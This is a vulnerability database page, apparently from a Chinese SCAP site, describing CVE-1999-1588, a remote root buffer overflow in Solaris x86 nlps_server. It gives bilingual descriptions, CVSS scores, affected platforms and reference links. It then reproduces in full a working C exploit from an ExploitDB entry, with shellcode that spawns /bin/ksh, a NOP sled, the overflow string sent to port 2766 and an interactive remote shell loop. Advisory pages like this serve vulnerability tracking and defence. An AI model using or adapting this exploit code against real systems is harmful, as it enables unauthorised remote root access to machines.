CVE-1999-1588
CVSS10.0
发布时间 :1999-12-31 00:00:00
修订时间 :2008-09-05 16:19:53
NMCOE    

[原文]Buffer overflow in nlps_server in Sun Solaris x86 2.4, 2.5, and 2.5.1 allows remote attackers to execute arbitrary code as root via a long string beginning with "NLPS:002:002:" to the listen (aka System V listener) port, TCP port 2766.


[CNNVD]Solaris x86 nlps_server远程缓冲区溢出漏洞(CNNVD-199912-121)

        
        Solaris 2.4、2.5和2.51的x86版本的nlps_server存在一个缓冲区溢出漏洞。
        nlps_server安装后会在2766端口监听,远程攻击者可以利用这个缓冲区溢出漏洞获得root访问权限。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:2.4::x86
cpe:/o:sun:solaris:2.5.1::x86

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1588
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1588
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199912-121
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/data/vulnerabilities/exploits/nlps_server.c
(UNKNOWN)  MISC  http://www.securityfocus.com/data/vulnerabilities/exploits/nlps_server.c
http://www.securityfocus.com/bid/2319
(UNKNOWN)  BID  2319
http://security-protocols.com/sploits/unsorted_exploits/nlps_server.c
(UNKNOWN)  MISC  http://security-protocols.com/sploits/unsorted_exploits/nlps_server.c
http://lsd-pl.net/files/get?SOLARIS/solx86_nlps_server
(UNKNOWN)  MISC  http://lsd-pl.net/files/get?SOLARIS/solx86_nlps_server

- 漏洞信息

Solaris x86 nlps_server远程缓冲区溢出漏洞
危急 边界条件错误
1999-12-31 00:00:00 2006-05-01 00:00:00
远程  
        
        Solaris 2.4、2.5和2.51的x86版本的nlps_server存在一个缓冲区溢出漏洞。
        nlps_server安装后会在2766端口监听,远程攻击者可以利用这个缓冲区溢出漏洞获得root访问权限。
        

- 公告与补丁

        厂商补丁:
        Sun
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://sunsolve.sun.com/security

- 漏洞信息 (20602)

Solaris x86 2.4/2.5 nlps_server Buffer Overflow Vulnerability (EDBID:20602)
solaris remote
1998-04-01 Verified
0 Last Stage of Delirium
N/A [点击下载]
source: http://www.securityfocus.com/bid/2319/info

Solaris 2.4, 2.5, and 2.51 x86 are vulnerable to a buffer overflow in nlps_server, a process residing on port 2766 when installed. Attackers can exploit this buffer overflow to gain remote root access. 

/*## copyright LAST STAGE OF DELIRIUM apr 1998 poland        *://lsd-pl.net/ #*/
/*## listen/nlps_server                                                      #*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>

#define ADRNUM 256
#define NOPNUM 64+46+7+4

char adr[4]="\x30\x79\x04\x08";

char shellcode[]=
    "\xeb\x1b"             /* jmp     <shellcode+30>       */
    "\x33\xd2"             /* xorl    %edx,%edx            */
    "\x58"                 /* popl    %eax                 */
    "\x8d\x78\x14"         /* leal    0x14(%eax),edi       */
    "\x52"                 /* pushl   %edx                 */
    "\x57"                 /* pushl   %edi                 */
    "\x50"                 /* pushl   %eax                 */
    "\xab"                 /* stosl   %eax,%es:(%edi)      */
    "\x92"                 /* xchgl   %eax,%edx            */
    "\xab"                 /* stosl   %eax,%es:(%edi)      */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)        */
    "\x83\xef\x3c"         /* subl    $0x3c,%edi           */
    "\xb0\x9a"             /* movb    $0x9a,%al            */
    "\xab"                 /* stosl   %eax,%es:(%edi)      */
    "\x47"                 /* incl    %edi                 */
    "\xb0\x07"             /* movb    $0x7,%al             */
    "\xab"                 /* stosl   %eax,%es:(%edi)      */
    "\xb0\x3b"             /* movb    $0x3b,%al            */
    "\xe8\xe0\xff\xff\xff" /* call    <shellcode+2>        */
    "/bin/ksh"
;

main(int argc,char **argv){
    char buffer[1024],*b; 
    int sck,i;
    struct sockaddr_in address;
    struct hostent *hp;

    printf("copyright LAST STAGE OF DELIRIUM apr 1998 poland  //lsd-pl.net/\n");
    printf("listen/nlps_server for solaris 2.4 2.5 2.5.1 x86\n\n");

    if(argc!=2){
        printf("usage: %s address\n",argv[0]);exit(1);
    }
    sck=socket(AF_INET,SOCK_STREAM,0);
    bzero(&address,sizeof(address));
    address.sin_family=AF_INET;
    address.sin_port=htons(2766);
    if((address.sin_addr.s_addr=inet_addr(argv[1]))==-1){
        if((hp=gethostbyname(argv[1]))==NULL){
            printf("error: address.\n");exit(-1);
        }
        memcpy(&address.sin_addr.s_addr,hp->h_addr,4);
    }
    if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0){
        perror("error");exit(-1);
    }
 
    sprintf(buffer,"NLPS:002:002:");
    b=&buffer[13];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<NOPNUM;i++) *b++=0x90;
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    for(i=0;i<(14+ADRNUM+NOPNUM+strlen(shellcode)+1);i++)
        printf("%02x",(unsigned char)buffer[i]);
    fflush(stdout);

    write(sck,buffer,14+ADRNUM+NOPNUM+strlen(shellcode)+34+1);
    write(sck,"yahoo...\n",9);

    while(1){
        fd_set fds;
        FD_ZERO(&fds);
        FD_SET(0,&fds);
        FD_SET(sck,&fds);
        if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
            int cnt;
            char buf[1024];
            if(FD_ISSET(0,&fds)){
                if((cnt=read(0,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(sck,buf,cnt);
            }
            if(FD_ISSET(sck,&fds)){
                if((cnt=read(sck,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(1,buf,cnt);
            }
        }
    }
}
		

- 漏洞信息

36583
Solaris nlps_server Listen Port (System V Listener) Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

1998-04-01 Unknow
1998-04-01 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站